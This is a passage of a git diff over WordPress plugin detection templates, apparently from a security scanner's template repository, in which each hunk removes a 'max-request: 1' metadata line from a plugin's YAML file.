--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index c8acf8c625..43cb2ab09c 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
